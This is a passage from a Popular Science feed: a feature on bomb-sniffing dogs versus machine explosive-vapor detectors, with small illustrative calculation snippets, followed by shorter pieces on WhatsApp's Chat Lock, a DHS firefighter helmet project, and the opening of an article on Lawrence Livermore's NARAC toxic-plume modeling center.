No machine can beat a dog’s bomb-detecting sniffer https://www.popsci.com/story/technology/dogs-bomb-detect-device/ Mon, 18 Mar 2019 21:21:29 +0000 https://www.popsci.com/uncategorized/dogs-bomb-detect-device/
A Labrador retriever smelling for explosives with a member of a bomb squad at the trial of the 2015 Boston Marathon bomber
A bomb-sniffing dog walks in front of a courthouse during the 2015 trial for accused Boston Marathon bomber Dzhokhar Tsarnaev. Matt Stone/MediaNews Group/Boston Herald via Getty Images

Dogs are the best bomb detectors we have. Can scientists do better?

The post No machine can beat a dog’s bomb-detecting sniffer appeared first on Popular Science.


This story was first published on June 3, 2013. It covered the most up-to-date bomb detection technology at the time, with a focus on research based on canine olfaction. Today, dogs' noses still hold an edge over chemical sensors: They've even been trained to sniff out bed bugs, the coronavirus, and homemade explosives like HMTDs.

IT’S CHRISTMAS SEASON at the Quintard Mall in Oxford, Alabama, and were it not a weekday morning, the tiled halls would be thronged with shoppers, and I’d probably feel much weirder walking past Victoria’s Secret with TNT in my pants. The explosive is harmless in its current form—powdered and sealed inside a pair of four-ounce nylon pouches tucked into the back pockets of my jeans—but it’s volatile enough to do its job, which is to attract the interest of a homeland defender in training by the name of Suge.

Suge is an adolescent black Labrador retriever in an orange DO NOT PET vest. He is currently a pupil at Auburn University’s Canine Detection Research Institute and comes to the mall once a week to practice for his future job: protecting America from terrorists by sniffing the air with extreme prejudice.

Olfaction is a canine’s primary sense. It is to him what vision is to a human, the chief input for data. For more than a year, the trainers at Auburn have honed that sense in Suge to detect something very explicit and menacing: molecules that indicate the presence of an explosive, such as the one I’m carrying.

The TNT powder has no discernible scent to me, but to Suge it has a very distinct chemical signature. He can detect that signature almost instantly, even in an environment crowded with thousands of other scents. Auburn has been turning out the world’s most highly tuned detection dogs for nearly 15 years, but Suge is part of the school’s newest and most elite program. He is a Vapor Wake dog, trained to operate in crowded public spaces, continuously assessing the invisible vapor trails human bodies leave in their wake.

Unlike traditional bomb-sniffing dogs, which are brought to a specific target—say, a car trunk or a suspicious package—the Vapor Wake dog is meant to foil a particularly nasty kind of bomb, one carried into a high traffic area by a human, perhaps even a suicidal one. In busy locations, searching individuals is logistically impossible, and fixating on specific suspects would be a waste of time. Instead, a Vapor Wake dog targets the ambient air.

As I approach the mall's central courtyard, where its two wings of chain stores intersect, Suge is pacing back and forth at the end of a lead, nose in the air. At first, I walk toward him and then swing wide to feign interest in a table covered with crystal curios. When Suge isn't looking, I walk past him at a distance of about 10 feet, making sure to hug the entrance of Bath & Body Works, conveniently the most odoriferous store in the entire mall. Within seconds, I hear the clattering of the dog's toenails on the hard tile floor behind me.

As Suge struggles at the end of his lead (once he’s better trained, he’ll alert his handler to threats in a less obvious manner), I reach into my jacket and pull out a well-chewed ball on a rope—his reward for a job well done—and toss it over my shoulder. Christmas shoppers giggle at the sight of a black Lab chasing a ball around a mall courtyard, oblivious that had I been an actual terrorist, he would have just saved their lives.

That Suge can detect a small amount of TNT at a distance of 10 feet in a crowded mall in front of a shop filled with scented soaps, lotions, and perfumes is an extraordinary demonstration of the canine’s olfactory ability. But what if, as a terrorist, I’d spotted Suge from a distance and changed my path to avoid him? And what if I’d chosen to visit one of the thousands of malls, train stations, and subway platforms that don’t have Vapor Wake dogs on patrol?

Dogs may be the most refined scent-detection devices humans have, a technology in development for 10,000 years or more, but they’re hardly perfect. Graduates of Auburn’s program can cost upwards of $30,000. They require hundreds of hours of training starting at birth. There are only so many trainers and a limited supply of purebred dogs with the right qualities for detection work. Auburn trains no more than a couple of hundred a year, meaning there will always be many fewer dogs than there are malls or military units. Also, dogs are sentient creatures. Like us, they get sleepy; they get scared; they die. Sometimes they make mistakes.

As the tragic bombing at the Boston Marathon made all too clear, explosives remain an ever-present danger, and law enforcement and military personnel need dogs—and their noses—to combat them. But it also made clear that security forces need something in addition to canines, something reliable, mass-producible, and easily positioned in a multitude of locations. In other words, they need an artificial nose.

Engineer in glasses and a blue coat in front of a bomb detector mass spectrometer
David Atkinson at the Pacific Northwest National Laboratory has created a system that uses a mass spectrometer to detect the molecular weights of common explosives in air. Courtesy Pacific Northwest National Laboratory

IN 1997, DARPA created a program to develop just such a device, targeted specifically to land mines. No group was more aware than the Pentagon of the pervasive and existential threat that explosives represent to troops in the field, and it was becoming increasingly apparent that the need for bomb detection extended beyond the battlefield. In 1988, a group of terrorists brought down Pan Am Flight 103 over Lockerbie, Scotland, killing 270 people. In 1993, Ramzi Yousef and Eyad Ismoil drove a Ryder truck full of explosives into the underground garage at the World Trade Center in New York, nearly bringing down one tower. And in 1995, Timothy McVeigh detonated another Ryder truck full of explosives in front of the Alfred P. Murrah Federal Building in Oklahoma City, killing 168. The “Dog’s Nose Program,” as it was called, was deemed a national security priority.

Over the course of three years, scientists in the program made the first genuine headway in developing a device that could “sniff” explosives in ambient air rather than test for them directly. In particular, an MIT chemist named Timothy Swager homed in on the idea of using fluorescent polymers that, when bound to molecules given off by TNT, would turn off, signaling the presence of the chemical. The idea eventually developed into a handheld device called Fido, which is still widely used today in the hunt for IEDs (many of which contain TNT). But that's where progress stalled.

Olfaction, in the most reductive sense, is chemical detection. In animals, molecules bind to receptors that trigger a signal that's sent to the brain for interpretation. In machines, scientists typically use mass spectrometry in lieu of receptors and neurons. Most scents, explosives included, are created from a specific combination of molecules. To reproduce a dog's nose, scientists need to detect minute quantities of those molecules and identify the threatening combinations. TNT was relatively easy: It has a high vapor pressure, meaning it releases abundant molecules into the air. That's why Fido works. Most other common explosives, notably RDX (the primary component of C-4) and PETN (found in plastic explosives such as Semtex), have very low vapor pressures—parts per trillion at equilibrium, and perhaps even parts per quadrillion once they're loose in the air.
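To put those mixing ratios in perspective, a liter of air at room temperature and pressure holds roughly 2.5 × 10²² molecules (a standard textbook figure, not one from the researchers). Even a few parts per trillion still leaves billions of explosive molecules in every liter; the hard part is singling them out from everything else in the air. A back-of-envelope calculation:

```python
AIR_MOLECULES_PER_LITER = 2.5e22  # ~1 L of air at room temperature and pressure

def vapor_molecules_per_liter(parts_per_trillion):
    """Molecules of a vapor in one liter of air at the given mixing ratio."""
    return parts_per_trillion * 1e-12 * AIR_MOLECULES_PER_LITER

# RDX at its ~5 parts-per-trillion equilibrium vapor pressure:
print(vapor_molecules_per_liter(5))      # ~1.25e11 molecules per liter
# Diluted a thousandfold (parts per quadrillion) once loose in the air:
print(vapor_molecules_per_liter(0.005))  # ~1.25e8 molecules per liter
```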

“That was just beyond the capabilities of any instrumentation until very recently,” says David Atkinson, a senior research scientist at the Pacific Northwest National Laboratory, in Richland, Washington. A gregarious, slightly bearish man with a thick goatee, Atkinson is the co-founder and “perpetual co-chair” of the annual Workshop on Trace Explosives Detection. In 1988, he was a PhD candidate at Washington State University when Pan Am Flight 103 went down. “That was the turning point,” he says. “I’ve spent the last 20 years helping to keep explosives off airplanes.” He might at last be on the verge of a solution.

When I visit him in mid-January, Atkinson beckons me into a cluttered lab with a view of the Columbia River. At certain times of the year, he says he can see eagles swooping in to poach salmon as they spawn. “We’re going to show you the device we think can get rid of dogs,” he says jokingly and points to an ungainly, photocopier-size machine with a long copper snout in a corner of the lab; wires run haphazardly from various parts.

Last fall, Atkinson and two colleagues did something tremendous: They proved, for the first time, that a machine could perform direct vapor detection of two common explosives—RDX and PETN—under ambient conditions. In other words, the machine “sniffed” the vapor as a dog would, from the air, and identified the explosive molecules without first heating or concentrating the sample, as currently deployed chemical-detection machines (for instance, the various trace-detection machines at airport security checkpoints) must. In one shot, Atkinson opened a door to the direct detection of the world’s most nefarious explosives.

As Atkinson explains the details of his machine, senior scientist Robert Ewing, a trim man in black jeans and a speckled gray shirt that exactly matches his salt-and-pepper hair, prepares a demonstration. Ewing grabs a glass slide soiled with RDX, an explosive that even in equilibrium has a vapor pressure of just five parts per trillion. This particular sample, he says, is more than a year old and just sits out on the counter exposed; the point being that it’s weak. Ewing raises this sample to the snout end of a copper pipe about an inch in diameter. That pipe delivers the air to an ionization source, which selectively pairs explosive compounds with charged particles, and then on to a commercial mass spectrometer about the size of a small copy machine. No piece of the machine is especially complicated; for the most part, Atkinson and Ewing built it with off-the-shelf parts.

Ewing allows the machine to sniff the RDX sample and then points to a computer monitor where a line graph that looks like an EKG shows what is being smelled. Within seconds, the graph spikes. Ewing repeats the experiment with C-4 and then again with Semtex. Each time, the machine senses the explosive.


A commercial version of Atkinson’s machine could have enormous implications for public safety, but to get the technology from the lab to the field will require overcoming a few hurdles. As it stands, the machine recognizes only a handful of explosives (at least nine as of April), although both Ewing and Atkinson are confident that they can work out the chemistry to detect others if they get the funding. Also, Atkinson will need to shrink it to a practical size. The current smallest version of a high-performance mass spectrometer is about the size of a laser printer—too big for police or soldiers to carry in the field. Scientists have not yet found a way to shrink the device’s vacuum pump. DARPA, Atkinson says, has funded a project to dramatically reduce the size of vacuum pumps, but it’s unclear if the work can be applied to mass spectrometry.

If Atkinson can reduce the footprint of his machine, even marginally, and refine his design, he imagines plenty of very useful applications. For instance, a version affixed to the millimeter wave booths now common at American airports (the ones that require passengers to stand with their hands in the air—also invented at PNNL, by the way) could use a tube to sniff air and deliver it to a mass spectrometer. Soldiers could also mount one to a Humvee or an autonomous vehicle that could drive up and sniff suspicious piles of rubble in situations too perilous for a human or dog. If Atkinson could reach backpack size or smaller, he may even be able to get portable versions into the hands of those who need them most: the marines on patrol in Afghanistan, the Amtrak cops guarding America’s rail stations, or the officers watching over a parade or road race.

Atkinson is not alone in his quest for a better nose. A research group at MIT is studying the use of carbon nanotubes lined with peptides extracted from bee venom that bind to certain explosive molecules. And at the French-German Research Institute in France, researcher Denis Spitzer is experimenting with a chemical detector made from micro-electromechanical machines (MEMs) and modeled on the antennae of a male silkworm moth, which are sensitive enough to detect a single molecule of female pheromone in the air.

Atkinson may have been first to demonstrate extremely sensitive chemical detection—and that research is all but guaranteed to strengthen terror defense—but he and other scientists still have a long way to go before they approach the sophistication of a dog nose. One challenge is to develop a sniffing mechanism. “With any electronic nose, you have to get the odorant into the detector,” says Mark Fisher, a senior scientist at Flir Systems, the company that holds the patent for Fido, the IED detector. With every sniff, a dog processes about half a liter of air, and it sniffs up to 10 times per second. Fido processes fewer than 100 milliliters per minute, and Atkinson's machine sniffs a maximum of 20 liters per minute.
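Running the numbers in that comparison makes the gap concrete (the sampling figures are the ones quoted above; the arithmetic is just unit conversion):

```python
# Liters of air sampled per minute, using the figures quoted above.
dog = 0.5 * 10 * 60   # 0.5 L per sniff x 10 sniffs per second x 60 seconds
fido = 0.1            # Fido: fewer than 100 mL per minute
atkinson = 20         # Atkinson's machine: up to 20 L per minute

print(dog)             # 300.0 L/min
print(dog / fido)      # a dog samples ~3,000x as much air as Fido
print(dog / atkinson)  # and ~15x as much as Atkinson's machine
```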

Another much greater challenge, perhaps even insurmountable, is to master the mechanisms of smell itself.

German shepherd patrolling Union Station in Washington, D.C.
To condition detection dogs to crowds and unpredictable situations, such as Washington, D.C.’s Union Station at Thanksgiving [above], trainers send them to prisons to interact with inmates. Mandel Ngan/Afp/Getty Images

OLFACTION IS THE OLDEST of the sensory systems and also the least understood. It is complicated and ancient, sometimes called the primal sense because it dates back to the origin of life itself. The single-celled organisms that first floated in the primordial soup would have had a chemical detection system in order to locate food and avoid danger. In humans, it’s the only sense with its own dedicated processing station in the brain—the olfactory bulb—and also the only one that doesn’t transmit its data directly to the higher brain. Instead, the electrical impulses triggered when odorant molecules bind with olfactory receptors route first through the limbic system, home of emotion and memory. This is why smell is so likely to trigger nostalgia or, in the case of those suffering from PTSD, paralyzing fear.

All mammals share the same basic system, although there is great variance in sensitivity between species. Those that use smell as the primary survival sense, in particular rodents and dogs, are orders of magnitude better than humans at identifying scents. Architecture has a lot to do with that. Dogs are lower to the ground, where molecules tend to land and linger. They also sniff much more frequently and in a completely different way (by first exhaling to clear distracting scents from around a target and then inhaling), drawing more molecules to their much larger array of olfactory receptors. Good scent dogs have 10 times as many receptors as humans, and 35 percent of the canine brain is devoted to smell, compared with just 5 percent in humans.

Unlike hearing and vision, both of which have been fairly well understood since the 19th century, scientists first explained smell only 50 years ago. “In terms of the physiological mechanisms of how the system works, that really started only a few decades ago,” says Richard Doty, director of the Smell and Taste Center at the University of Pennsylvania. “And the more people learn, the more complicated it gets.”

Whereas Atkinson’s vapor detector identifies a few specific chemicals using mass spectrometry, animal systems can identify thousands of scents that are, for whatever reason, important to their survival. When molecules find their way into a nose, they bind with olfactory receptors that dangle like upside-down flowers from a sheet of brain tissue known as the olfactory epithelium. Once a set of molecules links to particular receptors, an electrical signal is sent through axons into the olfactory bulb and then through the limbic system and into the cortex, where the brain assimilates that information and says, “Yum, delicious coffee is nearby.”

As is the case with explosives, most smells are compounds of chemicals (only a very few are pure; vanilla, for instance, is essentially just vanillin), meaning that the system must pick up all those molecules together and recognize the particular combination as gasoline, say, and not diesel or kerosene. Doty explains the system as a kind of code: “The code for a particular odor is some combination of the proteins that get activated.” To create a machine that parses odors as well as dogs do, science has to unlock the chemical codes and program artificial receptors to alert for multiple odors as well as combinations.
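Doty’s “code” metaphor can be made concrete with a toy sketch. Everything below is invented for illustration, assuming made-up receptor labels and activation patterns; real olfactory coding involves hundreds of receptor types and far messier signals:

```python
# Toy illustration of the "odor code" idea: an odor is identified by the
# combination of receptor types it activates, not by any single receptor.
# Receptor labels and activation patterns here are invented, not real data.

ODOR_CODES = {
    "gasoline": frozenset({"R1", "R4", "R7", "R9"}),
    "diesel":   frozenset({"R1", "R4", "R8", "R9"}),
    "kerosene": frozenset({"R1", "R5", "R7"}),
}

def identify(activated):
    """Return the odor whose code best matches the set of activated
    receptors (Jaccard similarity), or None if nothing overlaps."""
    best, best_score = None, 0.0
    for odor, code in ODOR_CODES.items():
        score = len(code & activated) / len(code | activated)
        if score > best_score:
            best, best_score = odor, score
    return best

print(identify({"R1", "R4", "R7", "R9"}))  # -> gasoline
```

Here an exact activation pattern matches gasoline perfectly, while partial overlaps score lower, which is roughly the sense in which a combination, not any single receptor, identifies an odor.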

In some ways, Atkinson’s machine is the first step in this process. He’s unlocked the codes for a few critical explosives and has built a device sensitive enough to detect them, simply by sniffing the air. But he has not had the benefit of many thousands of years of bioengineering. Canine olfaction, Doty says, is sophisticated in ways that humans can barely imagine. For instance, humans don’t dream in smells, he says, but dogs might. “They may have the ability to conceptualize smells,” he says, meaning that instead of visualizing an idea in their mind’s eye, they might smell it.

Animals can also convey metadata with scent. When a dog smells a telephone pole, he’s reading a bulletin board of information: which dogs have passed by, which ones are in heat, etc. Dogs can also sense pheromones in other species. The old adage is that they can smell fear, but scientists have proved that they can smell other things, like cancer or diabetes. Gary Beauchamp, who heads the Monell Chemical Senses Center in Philadelphia, says that a “mouse sniffing another mouse can obtain much more information about that mouse than you or I could by looking at someone.”

If breaking chemical codes is simple spelling, deciphering this sort of metadata is grammar and syntax. And while dogs are fluent in this mysterious language, scientists are only now learning the ABCs.

Dog in an MRI machine with computer screens in front
Paul Waggoner at Auburn University treats dogs as technology. He studies their neurological responses to olfactory triggers with an MRI machine. Courtesy Auburn Canine Detection Institute

THERE ARE FEW people who better appreciate the complexities of smell than Paul Waggoner, a behavioral scientist and the associate director of Auburn’s Canine Research Detection Institute. He has been hacking the dog’s nose for more than 20 years.

“By the time you leave, you won’t look at a dog the same way again,” he says, walking me down a hall where military intelligence trainees were once taught to administer polygraphs and out a door and past some pens where new puppies spend their days. The CRDI occupies part of a former Army base in the Appalachian foothills and breeds and trains between 100 and 200 dogs—mostly Labrador retrievers, but also Belgian Malinois, German shepherds, and German shorthaired pointers—a year for Amtrak, the Department of Homeland Security, police departments across the US, and the military. Training begins in the first weeks of life, and Waggoner points out that the floor of the puppy corrals is made from a shiny tile meant to mimic the slick surfaces they will encounter at malls, airports, and sporting arenas. Once weaned, the puppies go to prisons in Florida and Georgia, where they get socialized among prisoners in a loud, busy, and unpredictable environment. And then they come home to Waggoner.

What Waggoner has done over tens of thousands of hours of careful study is begin to quantify a dog’s olfactory abilities. For instance, how small a sample dogs can detect (parts per trillion, at least); how many different types of scents they can detect (within a certain subset, explosives for instance, there seems to be no limit, and a new odor can be learned in hours); whether training a dog on multiple odors degrades its overall detection accuracy (typically, no); and how certain factors like temperature and fatigue affect performance.

The idea that the dog is a static technology just waiting to be obviated really bothers Waggoner, because he feels like he’s innovating every bit as much as Atkinson and the other lab scientists. “We’re still learning how to select, breed, and get a better dog to start with—then how to better train it and, perhaps most importantly, how to train the people who operate those dogs.”

Waggoner even taught his dogs to climb into an MRI machine and endure the noise and tedium of a scan. If he can identify exactly which neurons are firing in the presence of specific chemicals and develop a system to convey that information to trainers, he says it could go a long way toward eliminating false alarms. And if he could get even more specific—whether, say, RDX fires different cells than PETN—that information might inform more targeted responses from bomb squads.


After a full day of watching trainers demonstrate the multitudinous abilities of CRDI’s dogs, Waggoner leads me back to his sparsely furnished office and clicks a video file on his computer. It was from a lecture he’d given at an explosives conference, and it featured Major, a yellow lab wearing what looked like a shrunken version of the Google Street View car array on its back. Waggoner calls this experiment Autonomous Canine Navigation. Working with preloaded maps, a computer delivered specific directions to the dog. By transmitting beeps that indicated left, right, and back, it helped Major navigate an abandoned “town” used for urban warfare training. From a laptop, Waggoner could monitor the dog’s position using both cameras and a GPS dot, while tracking its sniff rate. When the dog signaled the presence of explosives, the laptop flashed an alert, and a pin was dropped on the map.
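The beep-steering loop described above can be sketched in a few lines. This is a speculative reconstruction, not the actual CRDI system: the bearing math is standard, but the 45- and 135-degree thresholds and the command names are assumptions made for illustration:

```python
import math

# Hypothetical sketch of an Autonomous Canine Navigation-style steering
# loop: compare the dog's current heading with the compass bearing to the
# next waypoint and pick a beep command. Thresholds and command names are
# invented; the real system's logic is not public.

def bearing(lat1, lon1, lat2, lon2):
    """Initial compass bearing in degrees from point 1 to point 2."""
    d_lon = math.radians(lon2 - lon1)
    lat1, lat2 = math.radians(lat1), math.radians(lat2)
    x = math.sin(d_lon) * math.cos(lat2)
    y = (math.cos(lat1) * math.sin(lat2)
         - math.sin(lat1) * math.cos(lat2) * math.cos(d_lon))
    return math.degrees(math.atan2(x, y)) % 360

def beep_command(heading, lat, lon, wp_lat, wp_lon):
    """Map the angle between heading and waypoint bearing to a command."""
    off = (bearing(lat, lon, wp_lat, wp_lon) - heading + 180) % 360 - 180
    if abs(off) <= 45:
        return "straight"   # on course, no corrective beep
    if abs(off) >= 135:
        return "back"
    return "right" if off > 0 else "left"
```

With the dog at the origin heading north, a waypoint due east yields “right,” due west “left,” and one directly behind “back.”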

It’s not hard to imagine this being very useful in urban battlefield situations or in the case of a large area and a fast-ticking clock—say, an anonymous threat of a bomb inside an office building set to detonate in 30 minutes. Take away the human and the leash, and a dog can sweep entire floors at a near sprint. “To be as versatile as a dog, to have all capabilities in one device, might not be possible,” Waggoner says.

It’s important to recognize that both sides—the dog people and the scientists working to emulate the canine nose—have a common goal: to stop bombs from blowing up. And the most effective result of this technology race, Waggoner thinks, is a complementary relationship between dog and machine. It’s impractical, for instance, to expect even a team of Vapor Wake dogs to protect Grand Central Terminal, but railroad police could perhaps one day install a version of Atkinson’s sniffer at that station’s different entrances. If one alerts, they could call in the dogs.

There’s a reason Flir Systems, the maker of Fido, has a dog research group, and it’s not just for comparative study, says the man who runs it, Kip Schultz. “I think where the industry is headed, if it has forethought, is a combination,” he told me. “There are some things a dog does very well. And some things a machine does very well. You can use one’s strengths against the other’s weaknesses and come out with a far better solution.”

Despite working for a company that is focused mostly on sensor innovation, Schultz agrees with Waggoner that we should be simultaneously pushing the dog as a technology. “No one makes the research investment to try to get an Apple approach to the dog,” he says. “What could he do for us 10 or 15 years from now that we haven’t thought of yet?”

On the other hand, dogs aren’t always the right choice; they’re probably a bad solution for screening airline cargo, for example. It’s a critical task, but it’s tedious work sniffing thousands of bags per day as they roll by on a conveyor belt. There, a sniffer mounted over the belt makes far more sense. It never gets bored.

“The perception that sensors will put dogs out of business—I’m telling you that’s not going to happen,” Schultz told me, at the end of a long conference call. Mark Fisher, who was also on the line, laughed. “Dogs aren’t going to put sensors out of business either.”

Read more PopSci+ stories.

The post No machine can beat a dog’s bomb-detecting sniffer appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

WhatsApp released a super-secure new feature for private messages https://www.popsci.com/technology/whatsapp-chat-lock/ Mon, 15 May 2023 19:00:00 +0000 https://www.popsci.com/?p=541263
Close-up of WhatsApp home screen on smartphone
Conversations can now be locked via password and biometric entry. Deposit Photos

'Chat Lock' creates a password- and biometric-locked folder for your most sensitive convos.

The post WhatsApp released a super-secure new feature for private messages appeared first on Popular Science.


WhatsApp just got a new feature bolstering its long-standing emphasis on users’ privacy: a “Chat Lock” feature that squirrels away your most confidential conversations.

Much like Apple’s hidden photos option, Chat Lock allows users to create a separate folder for private discussions, protected by either a password or biometric access. Conversations filed within WhatsApp’s Chat Lock section will also hide both the sender and the message text in their push notifications, which display simply as “New Message.” According to WhatsApp’s owner, Meta, Chat Lock could prove useful for those “who have reason to share their phones from time to time with a family member or those moments where someone else is holding your phone at the exact moment an extra special chat arrives.”

[Related: WhatsApp users can now ghost group chats and delete messages for days.]

To enable the new feature, WhatsApp users simply need to tap the name of a one-to-one or group message and select the lock option. To see those classified conversations, just slowly pull down on the inbox icon, then input the required password or biometric information to unlock. According to WhatsApp, Chat Lock capabilities are set to expand even further over the next few months, including features like locking messages on companion devices and creating custom passwords for each chat on a single phone.

Chat Lock is only the latest in a number of updates to come to the world’s most popular messaging app. Earlier this month, WhatsApp introduced multiple updates to its polling feature, including single-vote polls, a search option, and notifications for when people cast their votes. The platform also recently introduced the ability to forward media and documents with captions for context.

[Related: 3 ways to hide photos and files on your phone.]

Although it has long billed itself as a secure messaging alternative to standard platforms such as Apple’s iMessage (both WhatsApp and iMessage use end-to-end encryption, as do some other apps), WhatsApp experienced a sizable user backlash in 2021 when it changed its privacy policy to allow for more personal data sharing with its parent company, Meta. Meanwhile, other privacy-focused apps like Signal and Telegram remain popular alternatives.

The US is seeking a firefighter helmet that protects against flames and bullets https://www.popsci.com/technology/firefighter-helmet-bullet-resistant/ Fri, 12 May 2023 14:00:00 +0000 https://www.popsci.com/?p=540735
A firefighter training scenario at Naval Station Great Lakes in April, 2023.
A firefighter training scenario at Naval Station Great Lakes in April, 2023. Cory Asato / US Navy

Firefighters have a job that can involve responding to scenes with active shooters.

The post The US is seeking a firefighter helmet that protects against flames and bullets appeared first on Popular Science.


Later this year, the Department of Homeland Security hopes to deliver a prototype of a new helmet for firefighters, a piece of gear designed to meet modern challenges in one flexible, composite form. Firefighting is dangerous work even when it’s narrowly focused on fires, but as first responders, firefighters handle a range of crises, including ones where the immediate threat may come more from firearms than flames. To meet that need, the Department of Homeland Security’s Science and Technology Directorate is funding a new, all-purpose firefighter helmet that will protect against both bullets and fire.

“Firefighters are increasingly called upon to respond to potentially violent situations (PVS), including active shooters, armed crowd and terrorist incidents, hazardous materials mitigation, and disaster response,” reads a Homeland Security scouting report published in July 2019, outlining the needs and limits of existing helmet models. “Currently, firefighters must carry one helmet for fire protection and one helmet for ballistic protection, which creates a logistical burden when firefighters must switch gear on the scene.” 

Relying on two distinct helmets for two distinct kinds of response is not an efficient setup, and it means that if a firefighter responding to one kind of emergency, like a shooter, is suddenly confronted with a fire, the first helmet offers inadequate protection for the task. Dealing with shooters is and remains the primary responsibility of law enforcement, but rescuing people from danger, including danger that involves a shooter, is squarely in firefighters’ wheelhouse, and being able to do that safely while bullets fly would improve their ability to carry out rescues.

Beyond survivability against both bullets and fires, Homeland Security evaluated helmets for how well they could incorporate self-contained breathing apparatus (SCBA) gear, fit integrated communications, and either project light or, if lights are not baked into the helmet design, easily mount and use lights. The breathing apparatus required for indoor firefighting must work cleanly with the helmet: unlike wildfire crews working in open air, firefighters indoors must venture into smoke-filled rooms, sometimes containing smoke from hazardous materials. Communications equipment lets firefighters stay in contact despite the sounds and obstructions of a burning building, and lighting can cut through smoke and blaze to help firefighters locate people in need of rescue.

The National Fire Protection Association sets standards for fire gear, and the ballistic standard chosen is the National Institute of Justice’s Level IIIA, which covers handgun bullets up to .44 Magnum but not rifle ammunition.

[Related: A new kind of Kevlar aims to stop bullets with less material]

In the 2019 evaluation, eight helmets met the standard for fire protection, while only one met the standard for ballistic protection. Fire and ballistic protection have largely been bifurcated in helmet design, which is partly what funding initiatives like the Science and Technology Directorate’s are built to solve. In that same evaluation of existing models, no single helmet offered ballistic protection alongside the other firefighting essentials sought in the program. The new designs all ditch the wide brim and long tail traditionally found in firefighting helmets, as the protection offered by the helmet’s distinctive shape can be met through other means.

“The NextGen Firefighter Helmet will be designed with a shell that can absorb energy during impact and rapidly dissipates it without injuring the skull or brain. While the current materials used in both firefighter and military helmets are inadequate for the temperature and ballistic protection being sought, they provide a useful blueprint for future innovation,” said DHS in a release. “For example, Kevlar fiber has a melting point of 1040 °F and has proven highly effective in ballistic helmets and body armor. Similarly, polyester resins used in current firefighter headgear can have glass transition temperatures (the point at which it becomes hard and brittle) as high as 386.6°F. The idea is that thermosetting resins can be reinforced with Kevlar fiber, creating a shell that meets both the thermal and ballistic protection requirements of the NextGen Firefighter Helmet.”

Other important design goals are ensuring that the finished product doesn’t weigh too much or strain wearers’ necks, as protective gear that injures wearers through repeated use is not helpful. That means a large helmet should ideally weigh under 62 ounces and a medium under 57 ounces. The helmet will also need to be simple to put on, taking less than a minute from start until it’s secure in place.

DHS expects the prototype to be ready by mid-2023, at which point it will conduct an operational field assessment. Firefighters will evaluate the helmet’s design and features to see whether what was devised in a lab and a workshop can meet their in-field needs. After that, should the prototype prove successful, the next step will be finding commercial makers to produce the helmets at scale, creating a new and durable piece of safety gear.

Inside the little-known group that knows where toxic clouds will blow https://www.popsci.com/technology/national-atmospheric-release-advisory-center/ Thu, 11 May 2023 11:00:00 +0000 https://www.popsci.com/?p=540401
illustration of scientist with 3D models
Ard Su

This center is in charge of modeling what happens in the atmosphere if a train derails—or a nuclear weapon explodes.

The post Inside the little-known group that knows where toxic clouds will blow appeared first on Popular Science.


WHEN A NUCLEAR-POWERED satellite crashes to Earth, whom do the authorities call? What about when a derailed train spills toxic chemicals? Or when a wildfire burns within the fenceline of a nuclear-weapons laboratory? When an earthquake damages a nuclear power plant, or when it melts down? 

Though its name isn’t catchy, the National Atmospheric Release Advisory Center (NARAC) is on speed dial for these situations. If hazardous material—whether of the nuclear, radiological, biological, chemical, or natural variety—gets spewed into the atmosphere, NARAC’s job is to trace its potentially deadly dispersion. The center’s scientists use modeling, simulation, and real-world data to pinpoint where those hazards are in space and time, where the harmful elements will soon travel, and what can be done.

The landscape of emergency response

NARAC is part of Lawrence Livermore National Laboratory in California, which is run by the National Nuclear Security Administration, which itself is part of the Department of Energy—the organization in charge of, among other things, developing and maintaining nuclear weapons. 

Plus, NARAC is part of a group called NEST, or the Nuclear Emergency Support Team. That team’s goal is to both prevent and respond to nuclear and radiological emergencies—whether they occur by accident or on purpose. Should a dirty bomb be ticking in Tempe, they’re the ones who would search for it. Should they not find it in time, they would also help deal with the fallout. In addition, NEST takes preventative measures, like flying radiation-detecting helicopters over the Super Bowl to make sure no one has poisonous plans. “That’s a very compelling national mission,” says Lee Glascoe, the program leader for LLNL’s contribution to NEST, which includes NARAC. “And NARAC is a part of that.”

And if a suspicious substance does get released into the atmosphere, NARAC’s job is to provide information that NEST personnel can use in the field and authorities can use to manage catastrophe. Within 15 minutes of a notification about toxic materials in the air, NARAC can produce a 3D simulation of the general situation: what particles are expected where, where the airflow will waft them, and what the human and environmental consequences could be. 

In 30 to 60 minutes, they can push ground-level data gathered by NEST personnel (who are out in the field while the NARAC scientists are running simulations) into their supercomputers and integrate it into their models. That will give more precise and accurate information about where plumes of material are in the air, where the ground will be contaminated, where affected populations are, how many people might die or be hurt, where evacuation should occur, and how far blast damage extends. 

Modeling the atmosphere

These capabilities drifted into Lawrence Livermore decades ago. “Livermore has a long history of atmospheric modeling, from the development of the first climate model,” says John Nasstrom, NARAC’s chief scientist.

That model was built by physicist Cecil “Chuck” Leith. Back in the early Cold War, Leith got permission from lab director Edward Teller (who co-founded the lab and was a proponent of the hydrogen bomb) to use early supercomputers to develop and run the first global atmospheric circulation model. Glascoe calls this effort “the predecessor for weather modeling and climate modeling.” The continuation of Leith’s work split into two groups at Livermore: one focused on climate and one focused on public health—the common denominator between the two being how the atmosphere works.

In the 1970s, the Department of Energy came to the group focused on public health and asked, says Nasstrom, whether the models could show in near real time where hazardous material would travel once released. Livermore researchers took that project on in 1973, working on a prototype that, during a real event, could tell emergency managers at DOE sites (home to radioactive material) and nuclear power plants which populations would receive what dose, and where.

The group was plugging along on that project when the real world whirled against its door. In 1979, a reactor at the Three Mile Island nuclear plant in Pennsylvania partially melted down. “They jumped into it,” Nasstrom says of his predecessors. The prototype system wasn’t yet fully set up, but the team immediately started to build in 3D information about the terrain around Three Mile Island to get specific predictions about the radionuclides’ whereabouts and effects.

After that near catastrophe, the group began preemptively building that terrain data in for other DOE and nuclear sites before moving on to the whole rest of the US and incorporating real-time meteorological data. “Millions of weather observations today are streaming into our center right now,” says Nasstrom, “as well as global and regional forecast model output from NOAA [the National Oceanic and Atmospheric Administration], the National Weather Service, and other agencies.” 

NARAC also evolved with the 1986 Chernobyl accident. “People anticipated that safety systems would be in place and catastrophic releases wouldn’t necessarily happen,” says Nasstrom. “Then Chernobyl went wrong, and we quickly developed a much larger-scale modeling system that could transport material around the globe.” Previously, they had focused on the consequences at a more regional level, but Chernobyl lofted its toxins around the globe, necessitating an understanding of that planetary profusion.

“It’s been in a continuous state of evolution,” says Nasstrom, of NARAC’s modeling and simulation capabilities. 

‘All the world’s terrain mapped out’

